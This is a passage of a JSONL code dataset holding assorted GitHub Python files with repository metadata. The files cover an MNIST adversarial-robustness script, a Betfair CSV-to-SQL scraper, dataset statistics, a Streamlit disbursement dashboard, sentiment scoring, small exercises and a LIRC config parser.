print(noise.abs().max())\n X_noisy = X + noise\n else:\n raise NotImplementedError #X_noisy = X + torch.randn_like(X) * sigma * 5 \n X_noisy = torch.clamp(X_noisy, min=0, max=255).int()\n\n # check the norm of (X - X_noisy), for each sample\n print((X_noisy - X).max())\n #noise_norm = torch.norm(X_noisy - X, dim=1)\n #print('noise_norm: ', noise_norm)\n\n X_noisy = X_noisy.cpu().numpy()\n\n return X_noisy\n\n\n\n# X: feature (numpy), y: label (numpy)\ndef get_adv_ex(data='mnist', pretrained=False, eps=0.3, source='', target=''):#test_mlp_attack=0):\n\n if data.lower() != 'mnist':\n raise NotImplementedError\n\n # load model & data\n if source.lower() == 'lenet':\n model = LeNet5().cuda()\n elif source.lower() == 'mlp':\n model = MLP().cuda()\n else:\n raise NotImplementedError\n \n X_train, y_train, X_test, y_test, train_loader, test_loader = load_mnist()\n print(X_train.shape, y_train.shape, X_test.shape, y_test.shape)\n\n # train a model & test (on clean data)\n if pretrained:\n PATH = f'{source}_mnist.pth'\n model.load_state_dict(torch.load(PATH))\n else:\n model = train(model, train_loader)\n #test(model, train_loader)\n test(model, test_loader)\n\n # generate adversarial sample \n # make adv_test_loader using (X_adv_test, y_test)\n X_adv_test = attack_and_test(X_test, y_test, model, eps)\n adv_test_dataset = torch.utils.data.TensorDataset(X_adv_test, y_test)\n adv_test_loader = torch.utils.data.DataLoader(adv_test_dataset, batch_size=128, shuffle=False)\n test(model, adv_test_loader)\n\n # normalize & convert to numpy\n X_adv_test = (X_adv_test * 255).round().cpu().numpy().astype(int) \n X_train = (X_train * 255).round().cpu().numpy().astype(int)\n print(X_train.max(), X_train.min())\n print(X_adv_test.max(), X_adv_test.min())\n y_train = y_train.cpu().numpy()\n y_test = y_test.cpu().numpy()\n\n # save\n eps_str = f'_{eps}'.replace('.', '_')\n source_str = f'_{source}'\n # with open(f'mnist_X_train.npy', 'wb') as f:\n # np.save(f, X_train)\n # with open(f'mnist_y_train.npy', 'wb') as f:\n # np.save(f, y_train)\n # with open(f'mnist_adv_X_test{source_str}{eps_str}.npy', 'wb') as f:\n # np.save(f, X_adv_test)\n # with open(f'mnist_adv_y_test{source_str}{eps_str}.npy', 'wb') as f:\n # np.save(f, y_test)\n\n\n if target != source:\n\n if target.lower() == 'lenet':\n target_model = LeNet5().cuda()\n elif target.lower() == 'mlp':\n target_model = MLP().cuda()\n else:\n raise NotImplementedError\n\n if pretrained:\n PATH = f'{target}_mnist.pth'\n target_model.load_state_dict(torch.load(PATH))\n else: # train model // test on clean data & adversarial data\n model = train(target_model, train_loader, name=target.lower())\n test(target_model, test_loader)\n test(target_model, adv_test_loader)\n #exit()\n\n return X_train, y_train, X_adv_test, y_test\n\n\n\n\n\ndef attack_and_test(X, y, model, eps): #, Xmin, Xmax, eps):\n\n #X, y = X[:10], y[:10]\n\n attack_radius_fraction = eps # 0.3\n Xmin, Xmax = X.min(), X.max()\n eps = torch.tensor([(Xmax - Xmin) * attack_radius_fraction])\n print('Min: {}, Max: {}, Attack radius: {}'.format(Xmin, Xmax, eps))\n\n \n # load model\n model.eval() \n bounds = (Xmin, Xmax)\n fmodel = fb.PyTorchModel(model, bounds=bounds)\n\n # check the clean accuracy\n cln_acc = fb.utils.accuracy(fmodel, X, y)\n print('clean accuracy: ', cln_acc)\n\n #pdb.set_trace()\n\n # attack model\n # cls_samples = {}\n # num_labels = 10\n # for clss in range(num_labels):\n # idx = clean_pred != clss\n # cls_samples[clss] = X[idx][0] # Just pick the first example\n\n # for current_X, current_Y in zip(X,y):\n # starting_points = []\n # for y in current_Y:\n # starting_points.append(cls_samples[int(y)])\n # starting_points = torch.stack(starting_points, dim=0).to(device)\n # advs, _, success = attack_fn(fmodel, current_X, current_Y, starting_points=starting_points, epsilons=epsilon_list)\n\n start_time = time.time()\n\n #attack = fb.attacks.BoundaryAttack()#(steps=25000) #(init_attack = fb.attacks.SaltAndPepperNoiseAttack) #LinfDeepFoolAttack #L2CarliniWagnerAttack\n attack = fb.attacks.LinfProjectedGradientDescentAttack()\n raw, clipped, is_adv = attack(fmodel, X, y, epsilons=eps)#, starting_points=X)\n rob_acc = 1 - is_adv.float().mean(axis=-1)\n print('robust accuracy: ', rob_acc)\n \n fin_time = time.time()\n print('running time: {:.6f}'.format(fin_time - start_time))\n\n\n return clipped[0]\n\n\n\n# def transfer_attack(X, y, X_test, y_test, model='mlp'):\n# # input: X, y, X_test, y_test: array\n# # X, X_test: [0, 1, ..., 255]\n\n# if model.lower() != 'mlp':\n# raise NotImplementedError\n \n# # convert pixels in X to normalized tensor\n# # convert y to tensor\n# X, X_test = torch.from_numpy(X)/255, torch.from_numpy(X_test)/255\n# y, y_test = torch.from_numpy(y), torch.from_numpy(y_test)\n\n# # make dataloader\n# train_dataset = torch.utils.data.TensorDataset(X, y)\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=128, shuffle=True)\n# test_dataset = torch.utils.data.TensorDataset(X_test, y_test)\n# test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=128, shuffle=False)\n\n# # load the model (MLP)\n\n\n# # train the model \n\n# # test the model \n\n","repo_name":"UW-Madison-Lee-Lab/LanguageInterfacedFineTuning","sub_path":"classification/utils/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":10878,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"69"}
+{"seq_id":"36120046840","text":"import os\nimport requests\nimport pypyodbc as odbc #pip install pypyodbc\nfrom urllib.parse import urljoin\nfrom bs4 import BeautifulSoup #pip install beautifulsoup4\nimport pandas as pd #pip install pandas\n\n\n# Add your settings\nDRIVER = 'SQL Server'\nSERVER_NAME = 'YOUR-SERVER-NAME'\nDATABASE_NAME = 'BetfairData'\n\n# Filters csv URL prefixes\n# Currently looks for UK & IE 'place' files\n# Can switch out to look for 'win' files\n\ndef matc(string):\n if 'dwbfpricesukplace' in string or 'dwbfpricesireplace' in string:\n return True\n return False\n\nurl = 'https://promo.betfair.com/betfairsp/prices'\n\n# Downloads csv files to the folder below and reimports to SQL Server\n# Add your preferred location to download the csv\n\nfolder_location = r'C:\\betfairdata'\nif not os.path.exists(folder_location):os.mkdir(folder_location)\n\nresponse = requests.get(url)\nsoup= BeautifulSoup(response.text, \"html.parser\")\n\n\ndef connection_string(driver, server_name, database_name):\n conn_string = f\"\"\"\n DRIVER={{{driver}}};\n SERVER={server_name};\n DATABASE={database_name};\n Trust_Connection=yes;\n \"\"\"\n return conn_string\n\ntry:\n conn = odbc.connect(connection_string(DRIVER, SERVER_NAME, DATABASE_NAME))\nexcept odbc.DatabaseError as e:\n print(\"Database error\")\n print(str(e.value[1]))\nexcept odbc.Error as e:\n print(\"Connection Error:\")\n print(str(e.value[1]))\n\ncursor = conn.cursor()\n\n# Include your SQL tablename\nsql_insert ='''\n INSERT INTO PlaceData\n VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\n'''\n\n\n# Dates are converted to int. eg 05-01-2010converts to 20100105\nDate = input(\"Enter the Start DATE (DD-MM-YYYY) : \") #Start Date\nDate = \"\".join(Date.split('-'))\nDate = int(Date[4:] + Date[2:4] + Date[:2])\n\nEndDate = input(\"Enter End DATE (DD-MM-YYYY) : \")\nEndDate = \"\".join(EndDate.split('-')) #End Date\nEndDate = int(EndDate[4:] + EndDate[2:4] + EndDate[:2])\n\nfor link in soup.select(\"a[href$='.csv']\"):\n\n # Fdate is extracted from the name of the csv file\n Fdate = str(link['href'])[-12:-4]\n Fdate = \"\".join(Fdate.split('-'))\n Fdate = int(Fdate[4:] + Fdate[2:4] + Fdate[:2])\n\n # Checking the condition Condition\n if matc(link['href']) and Fdate <= EndDate and Fdate >= Date: #Between StartDate and EndDate\n\n filename = os.path.join(folder_location,link['href'].split('/')[-1])\n\n with open(filename, 'wb') as f:\n f.write(requests.get(urljoin(url,link['href'])).content)\n\n df = pd.read_csv(filename)\n rc = df.shape[0]\n\n for i in range(rc):\n df['EVENT_DT'].iloc[i] = df['EVENT_DT'].iloc[i] + \":00\"\n\n df['EVENT_DT'] = pd.to_datetime(df['EVENT_DT']).dt.strftime('%Y-%m-%d %H:%M:%S')\n df.fillna(0, inplace=True)\n records = df.values.tolist()\n\n\n try:\n\n cursor.executemany(sql_insert, records)\n cursor.commit();\n except Exception as e:\n cursor.rollback()\n print(str(e))\n finally:\n print(\"Done\")\n\n # Cleans temporarily downloaded CSVs\n os.remove(filename)\n\n\nprint(\"ALL FILES TRANSFERED\")\ncursor.close()\nconn.close()\n","repo_name":"Deruzala/Betfair-Data-Scraper","sub_path":"Betfair-Data-Scraper.py","file_name":"Betfair-Data-Scraper.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
+{"seq_id":"38921259600","text":"#!/usr/bin/env python3\nimport argparse\nimport json\n\nimport pandas\n\n\"\"\"Read and output stat. information on a jsonic dataset\"\"\"\n\n\ndef inspect(dataset_path):\n with open(dataset_path) as f:\n dset = json.load(f)\n\n traintest = ('train', 'test')\n samples = {x: 0 for x in traintest}\n mean_num_words = {x: 0 for x in traintest}\n\n # for summarization datasets\n label_samples = {x: {} for x in traintest}\n mean_sentences_per_doc = {x: 0 for x in traintest}\n mean_summary_sentences_per_doc = {x: 0 for x in traintest}\n\n for ttest in traintest:\n if ttest not in dset['data']:\n continue\n data = dset['data'][ttest]\n if len(data) == 0:\n print(\"no samples!\")\n continue\n samples[ttest] = len(data)\n\n num_words = []\n num_sents = {}\n num_summary_sents = {}\n for datum in data:\n words = datum['text'].split()\n num_words.append(len(words))\n labels = datum['labels']\n for lab in labels:\n if lab not in label_samples[ttest]:\n label_samples[ttest][lab] = 0\n label_samples[ttest][lab] += 1\n\n\n if \"document_index\" in datum:\n # num sentences\n doc_idx = datum[\"document_index\"]\n if doc_idx not in num_sents:\n num_sents[doc_idx] = 0\n num_sents[doc_idx] += 1\n\n # num summary sentences\n if 1 in datum['labels']:\n if doc_idx not in num_summary_sents:\n num_summary_sents[doc_idx] = 0\n num_summary_sents[doc_idx] += 1\n\n mean_num_words[ttest] = sum(num_words) / len(data)\n if num_sents:\n mean_sentences_per_doc[ttest] = sum(\n num_sents.values()) / len(num_sents)\n if num_summary_sents:\n mean_summary_sentences_per_doc[ttest] = sum(\n num_summary_sents.values()) / len(num_summary_sents)\n\n stats = {\n \"samples\": {\n \"train\": samples['train'],\n \"test\": samples['test']\n },\n \"mean_num_words\": {\n \"train\": mean_num_words['train'],\n \"test\": mean_num_words['test']\n },\n \"mean_num_sentences\": {\n \"train\": mean_sentences_per_doc[\"train\"],\n \"test\": mean_sentences_per_doc[\"test\"]\n },\n \"mean_num_summary_sentences\": {\n \"train\": mean_summary_sentences_per_doc[\"train\"],\n \"test\": mean_summary_sentences_per_doc[\"test\"]\n },\n \"samples_per_label\": {\n \"train\": label_samples[\"train\"],\n \"test\": label_samples[\"test\"]\n }\n\n }\n df = pandas.DataFrame.from_dict(stats, orient='index')\n\n print(dataset_path, \"\\n\")\n print(df.round(3).to_string())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Read and output stat. information on a jsonic dataset')\n parser.add_argument('dataset_path')\n args = parser.parse_args()\n inspect(args.dataset_path)\n","repo_name":"npit/nlp-semantic-augmentation","sub_path":"tools/inspect-dataset.py","file_name":"inspect-dataset.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"14591815346","text":"import streamlit as st\nimport pandas as pd\nfrom streamlit.logger import get_logger\nimport altair as alt\nimport threading\nimport io # <-- Importa io\n\nLOGGER = get_logger(__name__)\n_lock = threading.Lock()\n\ndef process_dataframe(xls_path):\n with _lock:\n xls = pd.ExcelFile(xls_path, engine='openpyxl')\n desembolsos = xls.parse('Desembolsos')\n operaciones = xls.parse('Operaciones')\n\n # Asegúrate de que las columnas 'SECTOR' y 'SUBSECTOR' estén en 'operaciones'\n merged_df = pd.merge(desembolsos, operaciones[['IDEtapa', 'FechaVigencia', 'AporteFonplata', 'SECTOR', 'SUBSECTOR']], on='IDEtapa', how='left')\n merged_df['FechaEfectiva'] = pd.to_datetime(merged_df['FechaEfectiva'], dayfirst=True)\n merged_df['FechaVigencia'] = pd.to_datetime(merged_df['FechaVigencia'], dayfirst=True)\n merged_df['Ano'] = ((merged_df['FechaEfectiva'] - merged_df['FechaVigencia']).dt.days / 366).astype(int)\n merged_df['Meses'] = ((merged_df['FechaEfectiva'] - merged_df['FechaVigencia']).dt.days / 30).astype(int)\n\n result_df = merged_df.groupby(['IDEtapa', 'Ano', 'Meses', 'IDDesembolso', 'AporteFonplata'])['Monto'].sum().reset_index()\n result_df['Monto Acumulado'] = result_df.groupby(['IDEtapa'])['Monto'].cumsum().reset_index(drop=True)\n result_df['Porcentaje del Monto'] = result_df['Monto'] / result_df['AporteFonplata'] * 100\n result_df['Porcentaje del Monto Acumulado'] = result_df['Monto Acumulado'] / result_df['AporteFonplata'] * 100\n\n country_map = {'AR': 'Argentina', 'BO': 'Bolivia', 'BR': 'Brasil', 'PY': 'Paraguay', 'UR': 'Uruguay'}\n result_df['Pais'] = result_df['IDEtapa'].str[:2].map(country_map).fillna('Desconocido')\n\n # Añadir 'SECTOR', 'SUBSECTOR' y 'FechaVigencia' al DataFrame resultante\n result_df = pd.merge(result_df, operaciones[['IDEtapa', 'SECTOR', 'SUBSECTOR', 'FechaVigencia']], on='IDEtapa', how='left')\n\n return result_df\n\n\ndef dataframe_to_excel_bytes(df):\n output = io.BytesIO()\n with pd.ExcelWriter(output, engine='openpyxl') as writer:\n df.to_excel(writer, sheet_name='Resultados', index=False)\n output.seek(0)\n return output\n\ndef run():\n st.set_page_config(\n page_title=\"Desembolsos\",\n page_icon=\"👋\",\n )\n\n st.title(\"Matrices de Desembolsos 📊\")\n st.write(\"Carga tu archivo Excel y explora las métricas relacionadas con los desembolsos.\")\n uploaded_file = st.file_uploader(\"Carga tu Excel aquÃ\", type=\"xlsx\")\n \n if uploaded_file:\n result_df = process_dataframe(uploaded_file)\n st.write(result_df)\n \n # Convertir el DataFrame a bytes y agregar botón de descarga\n excel_bytes = dataframe_to_excel_bytes(result_df)\n st.download_button(\n label=\"Descargar DataFrame en Excel\",\n data=excel_bytes,\n file_name=\"resultados_desembolsos.xlsx\",\n mime=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n )\n \n filtered_df = result_df\n \n # Calcular Monto y Monto Acumulado para cada año\n df_monto_anual = filtered_df.groupby('Ano')[\"Monto\"].sum().reset_index()\n df_monto_acumulado_anual = df_monto_anual['Monto'].cumsum()\n\n # Calcular Porcentaje del Monto de forma acumulativa\n aporte_total = filtered_df['AporteFonplata'].iloc[0] # Asume que AporteFonplata es constante\n df_porcentaje_monto_anual = (df_monto_anual['Monto'] / aporte_total * 100).round(2)\n df_porcentaje_monto_acumulado_anual = (df_monto_acumulado_anual / aporte_total * 100).round(2)\n\n # Crear DataFrame combinado para el cuadro de resumen\n combined_df = pd.DataFrame({\n 'Ano': df_monto_anual['Ano'],\n 'Monto': df_monto_anual['Monto'],\n 'Monto Acumulado': df_monto_acumulado_anual,\n 'Porcentaje del Monto': df_porcentaje_monto_anual,\n 'Porcentaje del Monto Acumulado': df_porcentaje_monto_acumulado_anual\n })\n\n st.write(\"Resumen de Datos:\")\n\n combined_df = process_dataframe(uploaded_file)\n \n # Filtrar por paÃses múltiples\n countries = combined_df['Pais'].unique()\n selected_countries = st.multiselect('Selecciona PaÃses:', countries, default=countries)\n filtered_df = combined_df[combined_df['Pais'].isin(selected_countries)]\n\n # Configuración del formato de visualización de los DataFrame\n pd.options.display.float_format = '{:,.2f}'.format\n\n # Crear la tabla de Montos con años como columnas y IDEtapa como filas\n montos_pivot = filtered_df.pivot_table(\n index='IDEtapa', \n columns='Ano', \n values='Monto', \n aggfunc='sum'\n ).fillna(0)\n\n # Convertir los montos a millones\n montos_pivot = (montos_pivot / 1_000_000).round(3)\n\n # Agregar la columna de totales al final de la tabla de Montos\n montos_pivot['Total'] = montos_pivot.sum(axis=1)\n\n # Crear la tabla de Porcentajes con años como columnas y IDEtapa como filas\n porcentaje_pivot = filtered_df.pivot_table(\n index='IDEtapa', \n columns='Ano', \n values='Porcentaje del Monto', \n aggfunc='sum'\n ).fillna(0)\n\n # Redondear a dos decimales en el DataFrame de porcentajes\n porcentaje_pivot = porcentaje_pivot.round(2)\n\n # Agregar la columna de totales al final de la tabla de Porcentajes\n porcentaje_pivot['Total'] = porcentaje_pivot.sum(axis=1).round(0)\n\n # Mostrar las tablas en Streamlit con un ancho fijo y la posibilidad de desplazamiento horizontal\n st.write('Tabla de Montos En Millones de USD:')\n st.dataframe(montos_pivot, width=1500, height=600) # Ajusta el ancho y alto según sea necesario\n\n # Convertir el DataFrame a bytes y agregar botón de descarga\n excel_bytes = dataframe_to_excel_bytes(montos_pivot)\n st.download_button(\n label=\"Descargar DataFrame en Excel\",\n data=excel_bytes,\n file_name=\"matriz_montos_desembolsos.xlsx\",\n mime=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n )\n\n st.write('Tabla de Porcentajes del Monto:')\n st.dataframe(porcentaje_pivot, width=1500, height=600)\n\n # Convertir el DataFrame a bytes y agregar botón de descarga\n excel_bytes = dataframe_to_excel_bytes(porcentaje_pivot)\n st.download_button(\n label=\"Descargar DataFrame en Excel\",\n data=excel_bytes,\n file_name=\"matriz_porcentaje_desembolsos.xlsx\",\n mime=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n )\n\n # Aplicando la misma lógica para calcular los años hasta ahora y la categorización\n porcentaje_pivot['Años hasta Ahora'] = porcentaje_pivot.iloc[:, 1:10].apply(\n lambda row: row.last_valid_index(), axis=1\n )\n\n # Creando la función de categorización\n def categorize_project(row):\n if row['Total'] == 100:\n return 'Completado'\n elif row['Total'] >= 50:\n return 'Últimos Desembolsos'\n else:\n return 'Empezando sus Desembolsos'\n\n # Identificamos las columnas que contienen los porcentajes por año, excluyendo 'Total' y 'Años hasta Ahora'\n year_columns = [col for col in porcentaje_pivot.columns if col not in ['Total', 'Años hasta Ahora']]\n\n # Encontramos el último año con un valor que no sea cero para cada proyecto\n last_year_with_value = porcentaje_pivot[year_columns].apply(lambda row: row[row > 0].last_valid_index(), axis=1)\n\n # Agregamos esta información al DataFrame\n porcentaje_pivot['Último Año'] = last_year_with_value\n\n # Creando la columna de categorización\n porcentaje_pivot['CategorÃa'] = porcentaje_pivot.apply(categorize_project, axis=1)\n\n # Restableciendo el Ãndice para convertir 'IDEtapa' de nuevo en una columna\n porcentaje_pivot_reset = porcentaje_pivot.reset_index()\n\n # Seleccionando las columnas para la tabla final\n final_table_pivot = porcentaje_pivot_reset[['IDEtapa', 'Total', 'Último Año', 'CategorÃa']]\n\n # Creando la columna de categorización\n porcentaje_pivot['CategorÃa'] = porcentaje_pivot.apply(categorize_project, axis=1)\n\n # Contando el número de proyectos en cada categorÃa\n category_counts_pivot = porcentaje_pivot['CategorÃa'].value_counts()\n\n # Utilizar st.columns para colocar gráficos lado a lado\n col1, col2 = st.columns(2)\n with col1:\n # Mostrando las primeras filas de la tabla final\n final_table_pivot\n\n with col2:\n # Mostrando las primeras filas de la tabla final\n category_counts_pivot\n\n \n\nif __name__ == \"__main__\":\n run()\n","repo_name":"sandrocoronado/curvadesembolsos","sub_path":"pages/0_Matrices_Desembolsos.py","file_name":"0_Matrices_Desembolsos.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"75150806309","text":"\"\"\"\nMain function of the RPG. Short game description follows as soon as title and content of the game are designed\nThis file is made up of two parts:\n The initiation to init all parameters that need to be initiated only once\n The while loop that runs until the game is stopped somehow\n\"\"\"\n\nimport pygame\nimport os\nfrom files.gamestate import gamestate\nfrom files.game_settings import settings\nimport time # only for fps\n\n##environment variables\n#WIDTH, HEIGHT = 800, 800\n\n\n\n\n\n\n\n\ndef main():\n #constants\n FPS = 60\n SHOWFPS = True\n\n ##inits\n game_settings = settings()\n clock = pygame.time.Clock()\n WIN = pygame.display.set_mode((game_settings.screen_width, game_settings.screen_height))#for Fullscreen: (0, 0), pygame.FULLSCREEN\n pygame.display.set_caption(game_settings.game_title)\n game_state = gamestate(WIN,pygame)\n\n game_state.load() # initial tile load before loop start\n\n\n ##loop\n while game_state.run:\n start_time = time.time()# for FPS calculation\n game_state.gamestate_manager()\n\n clock.tick(FPS)\n if SHOWFPS:\n print(\"FPS:\" ,1/(time.time() -start_time))\n\n\n #save game \n game_settings.save_settings()\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"sebastianDebatin/RPG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20391587158","text":"from snownlp import SnowNLP\r\nimport pandas as pd\r\n\r\n\r\ndef get_score(text): #\r\n s = SnowNLP(text) # snownlp中的SnowNLP函数对text文本进行分词处理\r\n return s.sentiments # sentiments函数进行情感分析,即获得文本的情感评分\r\n\r\n\r\ndf = pd.read_excel(\"LiHongLiang.xlsx\") # 把xlsx中的评论读入变量df中\r\ndf[\"score\"] = df.comments.apply(get_score) # 对comments列的所有文本分别进行分词和情感分析,并将情感分析结果导入score列\r\ndf.to_excel(\"LiHongLiang.xlsx\") # 把df的内容读出到xlsx文档\r\nprint(df.head()) # 输出头部五行数据\r\n","repo_name":"Nullah-Wang/weibo-data-analysis","sub_path":"data analysis/snowNPL_test.py","file_name":"snowNPL_test.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32618110601","text":"import pandas as pd\n\n\ndata = pd.read_csv(\"/Users/gavinkoma/Desktop/pattern_rec/final/data_s14/dev/13/f013000.csv\")\nprint(data.head())\ntrain = pd.read_csv(\"/Users/gavinkoma/Desktop/pattern_rec/final/data_s14/train/02/f002000.csv\")\nprint(train.head())\n\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import multilabel_confusion_matrix,\\\n classification_report, \\\n log_loss, \\\n accuracy_score\nfrom sklearn import metrics\nimport csv\n\nmodel1 = MLPClassifier(hidden_layer_sizes=(30,15,10,5),\n \t activation=\"tanh\",\n \t random_state=1,\n \t \t max_iter=2000)\n\t\nx_train = train.drop(['class'], axis=1)\ny_train = train['class']\n#print(type(model).__name__)\nmodel.partial_fit(x_train,y_train,classes=[0,1,2,3,4])\n\n\n\n\n\n\n\n","repo_name":"gavinkoma/pattern_rec","sub_path":"pattern_rec/final/eval_functions.py","file_name":"eval_functions.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"2621740368","text":"\"\"\"\nInstance bound proxy:\nsuper(class, instance-of-class)\n\nFinds the MRO of second argument.\nFinds the location of the first argument in the MRO\nUses everything after that for resolving methods\n\"\"\"\nfrom training.ObjectOriented.Inheritance_and_Subtype_Polymorphism.sorted_list import *\n\nsil = SortedIntlist([5, 15, 10])\nsuper(SortedList, sil)\nsuper(SortedList, sil).add(6)\n\n\n","repo_name":"Jon-J/python_repo","sub_path":"training/ObjectOriented/Inheritance_and_Subtype_Polymorphism/09super_instance_bound_proxy.py","file_name":"09super_instance_bound_proxy.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36460716596","text":"from core import Database\n\nclass StudentModule:\n\n # Static methods which retrieve data from the database.\n @staticmethod\n def findById(id):\n rows = Database.getRows('SELECT * FROM `StudentModule` WHERE `id` = %s', (id,))\n\n if len(rows) == 0:\n return None\n \n studentModule = StudentModule()\n studentModule.setId(rows[0]['id'])\n studentModule.setModule(rows[0]['module'])\n studentModule.setStudent(rows[0]['student'])\n studentModule.setEnrolmentDate(rows[0]['enrolment_date'])\n\n return studentModule\n \n @staticmethod\n def all():\n rows = Database.getRows('SELECT * FROM `StudentModule`')\n\n out = []\n\n for i in rows:\n studentModule = StudentModule()\n studentModule.setId(i['id'])\n studentModule.setModule(i['module'])\n studentModule.setStudent(i['student'])\n studentModule.setEnrolmentDate(i['enrolment_date'])\n out.append(studentModule)\n\n return out\n\n @staticmethod\n def findBy(field, value):\n rows = Database.getRows('SELECT * FROM `StudentModule` WHERE ' + field +' = %s', (value,))\n\n out = []\n\n for i in rows:\n studentModule = StudentModule()\n studentModule.setId(i['id'])\n studentModule.setModule(i['module'])\n studentModule.setStudent(i['student'])\n studentModule.setEnrolmentDate(i['enrolment_date'])\n out.append(studentModule)\n\n return out\n\n # Class Methods\n def __init__(self):\n self.id = None\n self.row = {}\n\n return\n \n def save(self):\n if self.id == None:\n # insert\n Database.execute('INSERT INTO `StudentModule` (`module`,`student`, `enrolment_date`) VALUES (%s, %s, %s)', (self.row['module'],self.row['student'], self.row['enrolment_date']))\n\n rows = Database.getRows('SELECT LAST_INSERT_ID() AS insert_id')\n self.id = rows[0]['insert_id']\n else:\n # update\n Database.execute('UPDATE `StudentModule` SET `module` = %s ,`student` = %s, `enrolment_date` = %s WHERE `id` = %s', (self.row['module'],self.row['student'], self.row['enrolment_date'], self.id))\n \n def delete(self):\n if self.id == None:\n return\n\n Database.execute('DELETE FROM `StudentModule` WHERE `id` = %s', (self.id,)) \n\n # Methods for dealing with properties (setters and getters).\n \n def setId(self, id):\n self.id = id\n return self\n def getId(self):\n return self.id\n\n\n def setModule(self, module):\n self.row['module'] = module\n return self\n def getModule(self):\n return self.row['module']\n\n\n def setStudent(self, student):\n self.row['student'] = student\n return self\n def getStudent(self):\n return self.row['student']\n\n def setEnrolmentDate(self, enrolment_date):\n self.row['enrolment_date'] = enrolment_date\n return self\n def getEnrolmentDate(self):\n return self.row['enrolment_date']","repo_name":"Mwall93/A4_Scheduler","sub_path":"model/StudentModule.py","file_name":"StudentModule.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37915177986","text":"# 将两个有序链表合并为一个新的有序链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。\n#\n# 示例:\n#\n# 输入:1->2->4, 1->3->4\n# 输出:1->1->2->3->4->4\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef getList(l):\n def getNext(lLeft):\n if lLeft:\n currentNode = ListNode(lLeft[0])\n currentNode.next = getNext(lLeft[1:])\n return currentNode\n\n headNode = getNext(l)\n return headNode\n\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n # if l1 is None:\n # return l2\n # elif l2 is None:\n # return l1\n # else:\n # if l2.val < l1.val:\n # l1, l2 = l2, l1\n # currentNode = l1\n # while currentNode and l2:\n # while currentNode.next and currentNode.next.val < l2.val:\n # currentNode = currentNode.next\n # currentNode.next, l2 = l2, currentNode.next\n # if currentNode.next:\n # currentNode = currentNode.next\n # return l1\n if l1 is None:\n return l2\n elif l2 is None:\n return l1\n elif l1.val < l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\n pass\n\n\ns = Solution()\nl1 = getList([1, 2, 3])\nl2 = getList([1, 3, 4])\nnodeMerged = s.mergeTwoLists(l1, l2)\nwhile nodeMerged:\n print(nodeMerged.val)\n nodeMerged = nodeMerged.next\nl1 = getList([-9, 3])\nl2 = getList([5, 7])\nnodeMerged = s.mergeTwoLists(l1, l2)\nwhile nodeMerged:\n print(nodeMerged.val)\n nodeMerged = nodeMerged.next\n","repo_name":"vzpd/myBrushRecord","sub_path":"exercise/bd_合并两个有序链表.py","file_name":"bd_合并两个有序链表.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31069033930","text":"import codecs\nimport os\n\nremotes_folder = \"../lirc-remotes-code/remotes/\"\n\n\ndef get_name(manufacturer: str, conf_file: str) -> str:\n file_path = remotes_folder + manufacturer + \"/\" + conf_file\n\n with codecs.open(file_path, mode=\"r\", encoding=\"utf8\", errors=\"ignore\") as file:\n for each_line in file:\n stripped = each_line.strip()\n if stripped.startswith(\"begin remote\"):\n break\n\n for each_line in file:\n stripped = each_line.strip()\n if stripped.startswith(\"name\"):\n name = stripped[4:].strip()\n return name.replace(\"_\", \" \")\n\n return conf_file\n\n\ndef main():\n\n directories = tuple(\n _x\n for _x in os.listdir(remotes_folder)\n if os.path.isdir(remotes_folder + _x)\n )\n\n conf_files = {\n _d: tuple(\n _c\n for _c in os.listdir(remotes_folder + _d)\n if os.path.isfile(remotes_folder + _d + \"/\" + _c) and _c.endswith(\".conf\")\n )\n for _d in directories\n }\n\n for k, values in conf_files.items():\n for v in values:\n print(\"{:s}, {:s}: {:s}\".format(k, v, get_name(k, v)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wehnsdaefflae/PythonTurntable","sub_path":"get_conf.py","file_name":"get_conf.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
